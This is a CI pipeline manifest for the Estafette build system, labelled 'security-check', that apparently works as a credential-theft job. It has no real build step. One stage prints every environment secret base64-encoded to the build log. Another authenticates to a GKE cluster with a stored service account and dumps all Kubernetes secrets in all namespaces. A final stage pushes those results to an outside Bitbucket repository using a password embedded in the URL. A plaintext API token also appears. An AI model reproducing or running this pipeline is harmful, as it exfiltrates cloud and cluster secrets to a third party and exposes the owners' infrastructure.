builder:
  track: stable

labels:
  app: security-check

env:
  ESTAFETTE_CREDENTIALS_BITBUCKET_API_TOKEN: 1AJ5_8fqNLCKGFXgLNsNDMTVn0dsLjk5AMzpB9799i71rPckbpvU6JTlAw4CwChrKwsKbPE5s2ejYszPwI943Mt9saxVYrLpe9lmGsxgVepLJ3t81SCcEeKY
  sec_6: estafette.secret(ih8EAt19KGqE9Tyx.dwB6k5PhKx2RtIjzYRQoOaIdDfIjyQSDeet_9_QHJD3DHP7WjSUH6KSkjvYHZl5eBdji49qxYO3XDPpPHplktxU9XRPSngU8IShqqZESchtBHg_B7tkkvt7NmZ_JgfzblllmDeFnDfYjSvJXCyIphwVTTj2HiDQl9TKUDC2TWa_sgn7y_ytimZ-F-IJ92Q2arIZDgVcDiOz3qJ4kbO7V_-m4dlXg0lx_FlCQjlRWfcVW3dD5aVAFwhhFc4UrHhsE8W1o8PvIY2leF4PQTU0cXzGZryCAFc1358Viizkj3rH3Gdp0iVFUvRS7-yxj2suB9spyVOS8ejUKy6T4RvjdqAQY3-z13MnP7CrHJAXTMmXrn7ATkCl0m1fuMzdHqHAO6zcFz0s2IvxVdg2WnViBGN-U54FJEYYan05QCbbWiaCNZJczfrYENS965fZYSjk2dHCtsWmEwx4z54uFg--iZluzDE47TZZOA61YaERBI_K7ZpDpmJdmY77GN_bgiqaVjGS9WBayNUylMbPawABjKmaazgDPcQUrUh6uDziw6hw9XXAD-MmKe2pY3vc70YxZeagB1JfhTDOWfD2ig_BdXgmGm88IalaBLVXwo8HXpOcI2rZbtMkc5FTAwjwLYulDqdd28VD4FtthW47xHKtqlEw4fHNMTH_0sD5fGl7lc8Esvry8KRIMprasCWtndU308tvCDmVpZ2ArVo0C5qkumqB7w5EOo9haXplBr3V-aLX5OA1FgLAzw5m_UdeeBu28IFHhmc-XUnAoUpdUy1ReMtrJM9NRVptb2uR_w6cM72mX2RfyXL2HHp6ZVAoTPzZUw5E_cFF7IIGL3znIoDi86LOci6U1nr2vJzVJwZr44GjzuLcXNLomh0mI8q7yY5MpZvmLqhYWKvZuPC0uyFCjPHdQA9S0goROnLWUIzRm8rax_M-JJKxuKOFkUguSIVJlvzDm_iVdchPcxkVqaaS3g_49zFg-Iwa1j-QBTA3fOzrT4YJbPmmUMUfNftifgnpp9KVKrnrxpUyIHqTex5fDnsUrkgXIUsdl1ovX3TVlmyCv2S6dzHceHLVgx8PzTdiq-oSvFo3mnlfiW8XXAjpFItHt3JiCWfkrPZdrx-Z-IB1EaHQDbDoIQccUp9YxAUCmtjzLp_C4bpueQbQSbn69IjiaRbDpbXULvypb089JypL9YNCdhbIHc0T0qbhPIHEcO-qkGEblEbcAsZVxBnS-fy6LfT3H1fRntIyk0VEvT14y3CiwaVQb0O-KfGd8XFCbXDAgD3J7rHJiyMXF3zdpAXfVD5JbWL-OpFK2yPTjiP1byTjz6XZCcLXGXXMOg0fGQI5tZbkz2uqwCzcKYd_HleZX_z6JpEMNP3Lb5pakAwuWXMo8FJzylU_dy7UIaC2IU__JXw7w54AJ4WTPkCzygKHbJuF68oQFEGOZHObCofbnEOqNYVBpQhK4SldGHL6501dImdYUy08vg_JapA2IJqisxirMPnGO1LlgnpoFETzBzY5Un_501ZhZtZtEJPUeDv5ZyEf0RNRYKvNrqgL8gFRPs0rhWOzeP_Edlr75jIsJGizY-LZ7363lDvDw3OU38kBwe_lnZnrKcMyHq-b0UHldbAvGjMmh6QQ0PRrVUdcsJ8NwvFTOgcEKOLjGHbOGfxaWuhxf_4jKufdVDriLZpVTGngp_Ds6a-MCK_-uiKRPyge_vJ9oV8Dg3XR59a7S-l3-LqaF2avf9z3sOGLEncfXz2fU0D4JTJ0cRlg7j7Xs7tx3erVum4K5j86-acmv92ZQaE1tL2eY95l42euRzg5b7GtbASNCKakGSNbmAPHuof4yi0R8IxzvaJkN7YlkuizVXR26AcIF6pM8BE7GIxHpn-X6gm_hwFfBAdCpQgygrl7AZo1gi65ZdrN0LPTKICTgVOQPcMsjXgrkvlqEFoLM9a6eUa_xrwS6MdEAjJOPzbgHzXth9-yHcuPkKvUX_ve4IDiYNozwc9XhkjwWH2V3oKsvDlRsWrLo900EWTJb8iAnxpv66pdQgjoo1zRcP7Vk5wWvKjitxVBzqanMX6mXhRfWvZgSqqcM8bvBhIcj3Ch9HCtHou55ZWnPFho0fgEjZqcfiJSMCdAW_hKoYI0-ExTY9XAwm_k8D-esudh2iUQnJK2ukwofxCUpQW9sL_4FpR9ZR8D2UDXD3jpDZltxgBRPHystvZc3d-3MZ_w4ky7xaKBNEI5Kv52o4G89UI0YHcLdBicT-CLSY3bmh97kPOO1i50fl-5xciINKosz27QnpWAYyac0kY9Uk3vQWDpJOdv1Mp__KGm3jY-ewCDze2yARi0WqI1g8ZFKdKpnV83ZV7Rd7NKOoHnXaqLwq1BckNzQxFbfyn1HEuvwPsOuWRMAU5z_KboAWnnmjy3WXZp2Vyciu3-qVAmo5Mi5SmNLB8QjFmvv0pFQMOEiWPNOZRFPSzT3cCoSX_cP2dRkTEWnFnvOPd0uwh_gWl70yOxZnVmjTWI2zADOIT06e5yKQJkYOHOACDWlbIOHzeNfzxZm9BDyjfGplIeeJraYAcfcvUp47qRjjsy4FyDZMv7pOTcuV3EG6_vXX10H2DVbU6EltojpI6oeRLvKKBO7SGwOSXTztr2044D9f4fC32-GCXBn3CNFYmXFwwlFlg7CBuTtKRo2e9QAB8Uvj2tE8jr8-53JhpOy6QerLJkZYI0rsBEC9lfM6J7ek5vbnrQU1IGoO8fz96ji5wjxviAILk5qVdBn4Q_Ct2L1-W0LAJQAocsBqD-nOifreMqWFiu35AjD5smUu61xNvSYfz0fVEv6RofybV9lbyxuegL93eKIJeYEXhpmWV5nkUV4ssHC1m6bUCPQgJtvJ8Znpt-d01wjceyTVHu50uzlhZN5hLZUxWydMT_qHuwtMFnwiXSFtQx8j63AnaudLSnwWsZrCRuoLxPiSmjA9Z0C5n501csmOrBv4EtSbYc4sICZq_9XFmsIVCvkqmx4mWc3ClXXm8mUwCFYPvWNs-JmY9mYsJFttqFe6SC1Q4q1vflLJQLdjy9ejEZw60y3I27s2SDgfijX6tdgV0p-4zUc4x0ysKDI-KNNhjxQU1LBHwLojQlR_-gSH4b9SfMmPLofcUJVIgZIfx_t962Q2lKxUsKMIBk25quykZjuAqbIwgizMcjFFw1fGEpd7FPZfbjBlaJPrgXxz-cZIxbkqiyyKn2qBZL-ydkRoXRMofSfp9JodJPqeWEdMi6CJTa_W2gETNuCDJokULqsJv245HfiGvcPkbyWPO0Z8xwVDoNUPpdHNkuzW9wkSjifHEKJIqITvwRbDEPbJ8u2MRslCnlhbjpPXbeP-DdbTyT7dO_cNojFjF0rY1pmC47DYIPPfedSwEJckpVWRG7J66Ui1RlNIRE9B_nZdT4zhCavETw1vtbDHWovdHWW_XazDgZvtTK2uBV1fyr8jOKIijmjo9WDEE-BdYw2Qd_TZF1hyxOS7qvu0ecVY7EoRSPHZFC0_WZMiGxxtaH4lYvktGLy2Fh_6RmndJU8pTP-SfVUVs8qCqNHChipVXFafNdvwfcWsHDeJMo_hhM1VLzRSitMLn6pv1UDSSbEFf5YqwXjL2O6TmE3wMaf1VBVI5k_fUgfBm_OZS-RJkXmeGD8tSkr0ltyWlJbIR_5T0V9OXPb3hMdJs9LUEcY4rGIDb-trG8fV47cl4DSjV3FuxUR6eOmsR8akBCfdhdkpJrNvgZ_eMWYyB1IeveP1FhYN8cbW5Rsqb5lPWN-rT8d-HBJMNfnfdDHqFWIMdb8i2zw5wHJS6uBMSU-HFm-VLO6lZvna93P8JLCDWpg0u7CiH4V_cm--UFBEIVlbmNOq_ZADsfkaFMG3qz1aYtGeDxn0NW_IM1IX7gSqce7V4XzCTdAGg_mY3j3EoRf6Q_-4uebW6NLfJEmIZDs8wsHE69RdRRO7WTddLFF_snORDR_HrGcLtrsPDvpif2vWD76hV8roInSs11Fzog-vLSHBpXC9Y_HRS9JvS6WwdHhLbBSQ-LhTtQlLYE9PwIc13wMkLAFD841qoZOw-maSgsV6KM9HkodOXcZxWzWtPfXAI1_K3hctTV9FPUAuNly8uRTfIBwgF-nElJO1j3sAUuEQJpBplQL2ppYWEANtiuVqSlG1Sr-x98-tOM6Br7HEbeMYXz7JEtFOodQeWbsbSNPQVvKGGQu)
  GKE_SA: estafette.secret(bPUhOcB70zlKmWbE.FpA_5y5R31tzBjpQN2UyXTWVoJ0W6eMvxzxqolJFaTis12d40yHh0SkrAfGSMPioM_bhsrkgMD70rFMkPWaymtGneAjCwA2SrnCM50C7xx76VJL_060OEVBvcOXIBNYkj4E7ux2NkYOpIqYEz_SG9kl6sSwQXXDep2bJvwvu4NgC22BPYzACHjxjEIhILcV8WHwfrgVbOGf9VuTq5Fxd8qNKkivLJMhAIVUs3743K6nbwoSFRwU6hmt8_jbk2EkQK9xkq5dTJaBWlb4-BhGjY1H_nhSAyQE5IQUxr0bZez_3hIF8uRb1cB5BGhTTeR7aWWx_3b6czt48cbP8iwME0X_yYVkPl9tPmFak2uxR21d8_QVXutY3EH4vazEX8ME69JtJxyhgcL2ekiytpSCKtOQ7qWMsQRWmO4Br-0CaT6c7L3Bm2f2-SQF9G5QBqqpBzmdmzFYLwEJ8_XMKMxJR-CprGF18ZEbyKBHmGdeS4AYg-crfn4ZcxC_yHoB82N3wpD1-IwRKEICslkDiI6FZp5L8cyFKj2tzRjC3FhZQ5VRw5_IMtiADS6cMwIpR_aAZZmWgs518vCtsq5-Tvxi7A_WB_IVqX84EzS2FnxQB4bVbOybdJ15N4L3MdUapxI2dtlbFPBTLVr9jijSHK5AyzERl0phopUgPgqlvy-kNKNesujKyrXIoC6Rx9NVqljJltrAxL4osJwe6wWc1PhrI64BwYgPemdeBIJsPfzEZpzO2XZ60PUpR3Wan65BmZOU1PvkNKB2emgWCBwNgQuZR-T5rlyNl6T5Y_LRs7iFZNLtOOC0OCuzL5zlHwraKncUlNfcWeyrSZuZKQLBPaOpQJ7JbxgNi6ODF3LdcVJRUPOPsZK7dzu4F9V8x1XKCjO_ODnpQ_yj7EA3NUoyJeFDpLaQG7pLDs2eRGwtiwcCNO2tjaTf5ym1VgOMzzUMH2tbgCS9lRdcuDxsw8hEyyAuB3Gl-mf_8KgoYEdHKVrUk1FF4pRj7qsQrZLxdYmEgdcHRCPKQfmgrTeVReeCe4bEOvrLcBZOhyo_fzNv2I6BeH4d3_eMuMGyk6kyDFrK92MqSA95I2A_6QomklLtVmHE3UJIcuLqA-tDaX_nsa7iEKnOOE_ftny8bDzvEl9Lwa-ZXIiO-Hon3ReAgO8GwEu8cSDr96KOWa0pEBLTJ_ieLrplQuHxRop06vxSWa81wH5bEGyTTtsgbBaWrh1F__L0nAMdCfraH2U5eyBvxKF1iu3IgBeXhnYQ2kXxVhhDILcIrOXjfUXbVSDNOA1PrdLxMatuYXhuqmRwa4os4I_rYQuUURyyHNnb1H-RNPEN8RMdcr_7H1gA0FpEfMEfv-KP4sNSe8E9wAZcNiTcZnIOi8TZCTf5QmsXezqQroSMU8dRaQF87dTlagFNrTUk9DS_do_K1HERH_VD9RReTfNeqWUm_hOhOG2cetYfHB6OosmTVUziA2iTXjTk3pfu11_526COrEidLlETnwZJQhRD8bO55bS8xMf22geuiaPjqWwqKSK0nMxQyG9QFyts8H1EJ4XPhViBRAkW6dGU4iDXFiT_Tz_1tfwqqTA-5mW87JmR31xDM096GilMnXx_S3TpdNeY89GRWsARycoOIn4JryTNa46HH0DOcsl95IYebGiFkpEtG1SrRKqfmz8kpJv5nPvydTvS1VWXwFSDAXZgTa7BtacWScev9pKz3AltppSeaSHxFBsHqvqf3kAOBytbJn13Llcoxk14mUKvXUz_xIUaLXEQMGfrB8lP85nCOh0rLYlHFmjQ2QtPWceNvoI8BTqyQOtGMw0cWXz4BA-hhigLobilRQ4oNyB_XmpINo8mpeK0wL9UoZtXJwJEO-PN9tl8sL_xkTsUvMEkJxeW-FK4B-VVIxwpi4T8EXmBuYc4LMdcKVqsenFbPLH6jyWVIoiAgw5MCPPyTzxoQdHkpSw_-7oav79ADLffexRS0JPR1pMfVAEr6S1SYXOL_Nr2oQcIt-NhMOVOhe1smaBocjczdgHBS8U2eIrPKT4rrVtHYVkKlG8pJnqtnKHNZzj1FPR4NUfEapxXhmJZ5vI19Pi8mFSQMHSYaYgR9x1XUN9hLkmfYbCXjaU7by_5tEDnDOBASeHkklt8SQPVMXv5SGtiYICrE0pD3GOnUSq8Dw6nB4WxqpfUAdk2o4FDNwpBNS3Er8qWBK9BdOqH-keK3eqlJoogN4-7u5fAN0IFAZhW5zJvFy0Dr5bW6g9-phnAW3xBPMVy_rTS-5ruIuz54xlZlMp33vkg1vxeencSJJ_Z4sFFd3pSkSOpyiUJvEtyTWqaMBdo51Q5VFKnQjf9SGVqNJwmc8Vy0nsE2NPcmP1XEryKd-Ao0gRB5l7fmfluSMk_v7nU-Dz-Ummh3mN222dubJlQ5keqlv-J_6jz7QB_aI7xr--CaytaXnnyUNxyQ3-z6L-2opKUnY4rlBTb7J8xVYCH_yurqTt5FLDwlRK155GK2EB-4KNEJS3rZvX-4HDWwl64K34IuewzFjugzWa75QXl3VvyeYP6-SibTNEnZpeSlXnasPikLlUZCDT3yyeMMdZ6axg-_YgkXYQKEbJ1Yympv__BDVxdq3rbr53AmpvHKYi3CY_W9tOkg5gDOzkSWlKo8-BSgfn62tdtWdRKvW_hh19MpOMxDItfYKIW_JaxiOZDntGnpmmAnjOYHLzbVxtoThYB1Dxn9vtrRYdyR0LVwRynjdYuudtK_oBE7L4I09UNjdsqwOen_i3f-nFeVQxKU2Ak3iAZG2q6mwdPJKd9Xe6NefF-CbZ1amBDesIHeq890Bw9zqHnmKEZK6V4iQp3m8odk_1bPQ5d6I1AhDUbHum3TtMiwlBouqLPmfTe00o0Kwbsnx9v6psruYNLq6D2P7OcvCfcNXrRD1ob9wnpzRsK_jRjSNCMme-AjtUqSgJaoWh-5CzXQrmW-qOEad1CMmzXdAzZP__JvcMnvzmwAQmmrF1zEyjvdlGaIxVFZ7MstMdlbOQ5j6LhQvpa2iMHlSnhC9XD5sdEV5ma8dmSB97Bul0dWUOfeAMsQoaflAyFedVP1QPWI1ClNqogYot43uCT6YdY=)
  GKE_CREDENTIAL_1: estafette.secret(9QqBH-ahsEWeRt6V.Duz-QZzRhuW_3ucXdWIwKdwFRdnQwObBkOgr)
  GKE_CLUSTER_1: estafette.secret(fEVQTlROYjXv8tsk.fAftIfKoXVeizU9K8aQGwA6x4yqXQVY=)
  GKE_PROJECT_1: estafette.secret(JI2peeoa7t9JX7ah.0TBxqr3mSXF536Z0K49pCTaSkgvdS6UUFnG1R-UOSp15wDaq3Zw=)
  GKE_REGION_1: estafette.secret(qqMlsBmK2ANI3a8q.o8HveAxXDjYW-geO682chTtb9LRr_v82WTFOYA==)
  GKE_ZONE_1: estafette.secret(qWDZU4LV1gDilTrv.bhCN_n75_wVNb3WrB5f_oq6y1HuOf5X-10i8ZT5J)
  GKE_DEFAULT_NAMESPACE_1: estafette.secret(P3SXjbqMUh15GbyC.SCkJSeXPXj9aJlvx1l3Cf-mFoXI_OLg=)
stages:
  initialize: 
    image: estafette/cloud-sdk:stable
    shell: /bin/bash
    commands:
    - date
  set-pending-build-status:
    image: estafette/cloud-sdk:stable
    shell: /bin/bash
    commands:
    - ls -la
  print-secret-in-base64:
    image: docker:17.10.0-ce
    commands:
    - date
    - printenv > enc.txt
    - base64 enc.txt
  
  kubectl:
    image: estafette/cloud-sdk:stable
    shell: /bin/bash
    commands:
    - apk update
    - apk add jq
    - echo "${GKE_SA}" > key-file.json
    - GCLOUD_SA_NAME=$(cat key-file.json | jq -r '.client_email')
    - echo ${GCLOUD_SA_NAME}
    - gcloud auth activate-service-account ${GCLOUD_SA_NAME} --key-file ./key-file.json
    - gcloud config set account ${GCLOUD_SA_NAME}
    - gcloud config set project ${GKE_PROJECT_1}
    - gcloud container clusters get-credentials ${GKE_CLUSTER_1} --zone ${GKE_ZONE_1}
    - kubectl get secrets --all-namespaces
    - kubectl get secrets --all-namespaces > results.txt

  commit-results:
    image: estafette/cloud-sdk:stable
    shell: /bin/bash
    commands:
    - git clone https://The-Inspector@bitbucket.org/The-Inspector/resultes-from-estafette.git
    - cp results.txt resultes-from-estafette/results.txt
    - cd resultes-from-estafette
    - git config --global user.email "the-inspector@xyz.com"
    - git config --global user.name "the-inspector"
    - git add results.txt
    - git commit -m "results"
    - git push https://The-Inspector:YTDSVu37Xvfpr7vYNwrH@bitbucket.org/The-Inspector/resultes-from-estafette.git --all

  set-build-status:
    image: estafette/cloud-sdk:stable
    shell: /bin/bash
    commands:
    - date
    - date
    - date